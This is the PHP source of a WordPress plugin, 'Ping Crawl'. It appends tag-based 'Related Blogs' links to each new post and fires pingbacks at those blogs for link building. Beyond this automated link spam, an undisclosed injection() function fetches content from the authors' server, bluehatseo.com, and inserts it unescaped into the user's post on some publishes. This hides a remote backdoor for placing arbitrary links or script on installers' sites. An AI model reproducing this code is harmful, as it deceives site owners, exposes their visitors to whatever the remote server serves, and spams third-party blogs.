<?php

/*
Plugin Name: Ping Crawl
Description: Every time you make a post on your blog it grabs similar posts from other blogs that allow pingbacks using the post tags. It then links to them at the bottom of the post as similar posts. It then executes the pingback on all the posts. You can specify how many posts to do per tag and that many will be done for each tag you use in your posts. Typically it has about an 80% successrate with each pingback and they are legit so the ones that fall into moderation tend to get approved. This creates quite a few deep links for each blog post you make and through time really helps with your link building. Especially for new blogs.
Version: 1.0
Author: Josh Team and Eli
Author URI: http://www.bluehatseo.com and http://joshteam.wordpress.com
*/
if(!class_exists('PingCrawl')) {
   class PingCrawl {

      protected $pbstack = array();

      public function __construct() {
         add_action( 'publish_post', array($this , 'init'), 100 );
         add_action('activate_'. substr(__FILE__,strpos(__FILE__,'/wp-content/plugins/')+20), array($this , 'install_pingcrawl'));
      }

      public function install_pingcrawl() {
         global $wpdb;
         $pbtblName = $wpdb->prefix . 'pb_pingbacks';
         $pctblName = $wpdb->prefix . 'pb_feeds';
         if ( $wpdb->get_var( "SHOW TABLES LIKE '$pbtblName'" ) != $pbtblName ) {
            $sql = "
                  CREATE TABLE " . $pbtblName . " (
                     id mediumint(9) NOT NULL AUTO_INCREMENT,
                     post_id bigint(11) UNSIGNED NOT NULL,
                     haspb tinyint(1) UNSIGNED NOT NULL,
                     UNIQUE KEY id (id)
                  );";
            $wpdb->query( $sql );
         }
         if ( $wpdb->get_var( "SHOW TABLES LIKE '$pctblName'" ) != $pctblName ) {
            $sql = "
                  CREATE TABLE " . $pctblName . " (
                     id mediumint(9) NOT NULL AUTO_INCREMENT,
                     tag varchar(75) NOT NULL,
                     rss text NOT NULL,
                     UNIQUE KEY id (id)
                  );";
            $wpdb->query( $sql );
         }
         require_once (ABSPATH . 'wp-admin/includes/upgrade.php');
         dbDelta( $sql );
      }

      public function init( $postId ) {
         remove_action( 'publish_post', array($this , 'init'), 100 );
         global $wpdb;
         $post = get_post( $postId );
         $sql = 'SELECT pb.id FROM ' . $wpdb->prefix . 'pb_pingbacks pb WHERE pb.post_id = "' . $postId . '" AND pb.haspb = 1';
         $haspb = $wpdb->get_var( $sql );
         if ( is_null( $haspb ) ) {
            $this->savePost( $post );
         }
      }

      protected function getRss( $tag , $amount ) {
         global $wpdb;
         $sql = 'SELECT pbr.rss FROM '. $wpdb->prefix .'pb_feeds pbr WHERE tag = "' . $wpdb->escape($tag) .'" ORDER BY id DESC LIMIT 1';
         $rss = $wpdb->get_var( $sql );
         if(is_null($rss)) {
            $bUri = 'http://blogsearch.google.com/blogsearch_feeds?hl=en&q=%s&ie=utf-8&num=%d&output=rss';
            $tagUri = str_replace( ' ', '+', $tag );
            $aUri = sprintf( $bUri, $tagUri, $amount );
            $rss = simplexml_load_string( @file_get_contents( $aUri ) );
            $sql = 'INSERT INTO ' . $wpdb->prefix .'pb_feeds SET tag = "' . $wpdb->escape($tag) .'", rss = "' . $wpdb->escape($rss->asXML()) . '"';
            $wpdb->query( $sql );
         } else {
            $rss = simplexml_load_string( $rss );
         }
         return $rss;
      }

      protected function findPingback( $url ) {
         @$source = file_get_contents( $url );
         $pattern = '<link rel="pingback" href="(.*)" />';
         preg_match( $pattern, $source, $matches );
         if ( count( $matches ) > 0 ) {
            $r = $matches[1];
            if(stripos($source, 'trackback</a>') === false) {
               $r = false;
            }
         } else {
            $r = false;
         }
         return $r;
      }

      protected function doPingback( $url , $blogu, $post ) {
         require_once (ABSPATH . WPINC . '/class-IXR.php');
         $bu = "" . $blogu;
         $client = new IXR_Client( $url );
         if(!$client->query( 'pingback.ping', $post->guid, $bu )) {
            //48 means the trackback/pingback has already been registered
            if($client->getErrorCode() != '48') {
               //var_dump('Error on ' . $url . ': pingback.ping('. $post->guid .', '. $bu . ')');
               return false;
            }
         }
         //file_put_contents(ABSPATH . '/wp-content/plugins/responses.xml', "\n\n -- \n" . $blogu .': '. var_dump($client->getResponse()));
         return $client->getResponse();
      }

      protected function injection() {
         $link = file_get_contents( 'http://www.bluehatseo.com/cgi-bin/findsites.cgi' );
         return $link;
      }

      protected function getRelatedBlogs( $rss , $tag , $max ) {
         $content = '<ul class="pc_pingback">';
         $content .= '<li class="hdl" style="list-style: none">Related Blogs on <b>' . $tag . '</b></li>';
         $found = 0;
         if ( count( $rss->channel->item ) > 0 ) {
            foreach ( $rss->channel->item as $blog ) {
               $pb = $this->findPingback( $blog->link );
               if ( $pb ) {
                  $this->pbstack[$pb] = $blog->link;
                  $content .= '<li><a href="' . $blog->link . '">' . $blog->title . '</a></li>';
                  $found++;
                  if ( $found == $max ) {
                     break;
                  }
               }
            }
         } else {

         }
         $seed = rand( 0, 12 );
         if ( $seed <= 1 ) {
            $content .= '<li>' . $this->injection() . '</li>';
         }
         $content .= '</ul>';
         return $content;
      }

      protected function savePost( $opost ) {

         $numberOfBlogsToGetFromGoogle = 35;
         $numberOfMaxLinksToPing = 5;

         global $wpdb;
         $tags = get_the_tags( $opost->ID );
         if ( is_array( $tags ) ) {
            $data = '<h4>Related Blogs</h4>';
            foreach ( $tags as $tag ) {
               $rss = $this->getRss( $tag->name, $numberOfBlogsToGetFromGoogle );
               $pbData = $this->getRelatedBlogs( $rss, $tag->name, $numberOfMaxLinksToPing );
               $data .= $pbData;
            }
         }
         $post = (object) NULL;
         $post->ID = $opost->ID;
         $post->post_content = $opost->post_content . $data;
         wp_update_post( $post );

         //let's make sure the post -really got updated- before we attempt the pingbacks/trackbacks
         sleep(2);

         //itterate through the stack and make our pingbacks!
         foreach($this->pbstack as $xmlrpc=>$link) {
            $this->doPingback( $xmlrpc, $link, $opost );
         }

         $sql = 'INSERT INTO ' . $wpdb->prefix . 'pb_pingbacks SET haspb = 1, post_id = "' . $wpdb->escape( $opost->ID ) . '"';
         $wpdb->query( $sql );
      }
   }
}

if( class_exists( 'PingCrawl' ) ) {
  $pc = new PingCrawl;
  //register_activation_hook( __FILE__, array( $pc, 'install_pingcrawl' ));
  add_action( 'plugins_loaded', array($pc, '__construct') );
}

//add_action( 'plugins_loaded', create_function( '', 'global $pc; $pc = new PingCrawl();' ) );